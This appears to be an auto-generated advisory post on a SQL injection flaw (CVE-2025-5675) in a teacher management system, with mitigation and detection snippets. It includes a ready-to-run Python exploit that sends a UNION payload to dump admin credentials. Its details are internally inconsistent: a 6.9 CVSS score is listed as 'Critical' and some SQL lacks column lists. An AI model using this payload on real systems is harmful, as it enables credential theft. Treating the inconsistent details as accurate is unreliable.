Listen to this Post
How CVE-2025-5675 Works
The vulnerability exists in `/trms/admin/bwdates-reports-details.php` where improper sanitization of `fromdate` and `todate` parameters allows SQL injection. Attackers craft malicious date-range inputs containing SQL payloads, which are directly concatenated into database queries. This enables unauthorized data extraction, modification, or deletion. The flaw stems from missing prepared statements and input validation, allowing remote exploitation without authentication (CVSS 6.9). Public exploits leverage UNION-based techniques to bypass authentication and dump admin credentials.
DailyCVE Form
Platform: Campcodes Teacher System
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 2025-06-05
Prediction: Patch by 2025-08-15
What Undercode Say:
Exploitation
import requests
TARGET = "http://target.com/trms/admin/bwdates-reports-details.php"
PAYLOAD = "' UNION SELECT 1,concat(username,':',password),3,4 FROM admin-- -"
response = requests.post(TARGET, data={"fromdate": PAYLOAD, "todate": "2025-01-01"})
print(response.text)
Detection
SELECT FROM logs WHERE uri LIKE '%bwdates-reports-details.php%' AND params LIKE '%UNION%';
Mitigation
1. Input Validation:
if (!preg_match('/^\d{4}-\d{2}-\d{2}$/', $_POST['fromdate'])) {
die("Invalid date format");
}
2. Prepared Statements:
$stmt = $conn->prepare("SELECT FROM records WHERE date BETWEEN ? AND ?");
$stmt->bind_param("ss", $fromdate, $todate);
3. WAF Rules:
location ~ /trms/admin/ {
deny all;
}
Post-Exploit Analysis
Check for dumped credentials grep -r "admin:[a-f0-9]" /var/log/apache2/access.log
Patch Verification
curl -s http://target.com/trms/admin/ | grep "1.0-patched"
References
- CVE: https://nvd.nist.gov/vuln/detail/CVE-2025-5675
- Exploit-DB: 49822
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
